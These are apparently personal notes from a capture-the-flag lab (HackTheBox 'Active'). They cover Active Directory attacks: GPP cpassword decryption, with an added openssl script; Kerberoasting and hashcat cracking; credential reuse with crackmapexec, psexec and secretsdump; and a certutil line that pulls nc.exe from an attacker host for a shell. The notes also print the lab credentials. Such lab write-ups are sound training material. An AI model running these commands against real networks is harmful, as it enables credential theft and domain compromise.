Active

SMB enumeration: we get a GPP cpassword. Decrypt it (gpp-decrypt uses the public GPP AES key, so no cracking is needed):

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

GPPstillStandingStrong2k18

User was:

name="active.htb\SVC_TGS"
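Added example (not part of the original notes, and not the gpp-decrypt tool itself): the same decryption done by hand with openssl, so it is clear why a cpassword is effectively plaintext. The AES-256 key and all-zero IV are the ones Microsoft published for Group Policy Preferences; the sample input is the cpassword from the notes above. MS14-025 removed the feature, but stale Groups.xml files with cpassword values still turn up in SYSVOL, which is what a defender should be hunting for.

```shell
#!/bin/sh
# Added example: decrypt a GPP cpassword value without gpp-decrypt.
# The key is Microsoft's published GPP AES-256 key, not a secret, so
# any cpassword attribute in SYSVOL can be recovered by anyone who can
# read the share. Defensive fix: remove such Groups.xml entries and
# rotate the accounts they reference.
GPP_AES_KEY="4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
GPP_AES_IV="00000000000000000000000000000000"   # GPP uses an all-zero IV

# Sample input (taken from the notes above): the cpassword attribute.
SAMPLE_CPASSWORD="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

# Restore the base64 '=' padding that Microsoft strips from the attribute.
gpp_pad_b64() {
    b64="$1"
    while [ $(( ${#b64} % 4 )) -ne 0 ]; do
        b64="${b64}="
    done
    printf '%s' "$b64"
}

# base64 -> AES-256-CBC decrypt (openssl removes the PKCS#7 padding)
# -> drop the NUL bytes of the UTF-16LE encoding. Dropping NULs is
# adequate for ASCII passwords; for non-ASCII ones pipe through
# "iconv -f UTF-16LE -t UTF-8" instead of tr.
gpp_decrypt() {
    gpp_pad_b64 "$1" \
        | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | tr -d '\000'
}

# Usage: gpp_decrypt "<cpassword>"   -> prints the cleartext password
gpp_decrypt "$SAMPLE_CPASSWORD"
echo
```

The only moving parts are the fixed key and IV; everything else is standard base64 and AES-CBC, which is why tools like gpp-decrypt are a few lines long and why the value must be treated as a cleartext credential wherever it is found.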

Where did I find this file on SMB?

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>

Mistake here: I was not working recursively.

Try new user with crackmapexec (cme)?

cme smb 10.10.10.100 -u 'active.htb\SVC_TGS' -p 'GPPstillStandingStrong2k18' --local-auth --shares

psexec?

psexec.py active.htb\SVC_TGS:'GPPstillStandingStrong2k18'@10.10.10.100

it’s a TGS. Kerberoast?

sudo GetUserSPNs.py active.htb\SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

Mistake: backslash instead of forward slash in the target string, and it took forever to figure out.

CORRECT command that gave us the admin hash:

sudo GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

how the write up did it:

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs

hash:

dump SAM:

cme smb 10.10.10.100 -u 'SVC_TGS' -d active.htb -p GPPstillStandingStrong2k18 --local-auth --sam

nothing

Hashcat for kerberoasting:

hashcat -m 7500 activeKerb.txt rockyou.txt -O

Cracked!

New credentials:

Administrator:Ticketmaster1968

secretsdump?

secretsdump.py active.htb/SVC_TGS:'GPPstillStandingStrong2k18'@10.10.10.100

connect to shares again as service:

smbclient \\\\10.10.10.100\\Users -U SVC_TGS%GPPstillStandingStrong2k18

running a shell command from inside smbclient (note: a !command line runs on the attacking host, not on the target):

!shellcommand
!whoami

Move over netcat for shell?

certutil -urlcache -f http://10.10.14.19:8080/nc.exe nc.exe

certutil doesn’t let us do it. Try curl?